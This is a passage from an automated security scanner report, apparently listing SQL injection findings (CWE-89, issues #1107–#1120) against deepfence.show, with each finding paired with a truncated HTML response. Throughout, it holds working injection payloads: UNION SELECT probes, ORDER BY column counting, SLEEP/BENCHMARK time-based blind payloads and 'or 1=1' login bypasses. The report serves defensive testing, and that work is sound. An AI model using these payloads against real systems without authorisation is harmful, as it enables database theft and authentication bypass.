href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1107\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1108\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1109\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1110\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1111\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1112\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ admin') or '1'='1deepfence.io\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1113\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #1114\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1115\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1116\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1117\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1 or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1118\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1119\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1120\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 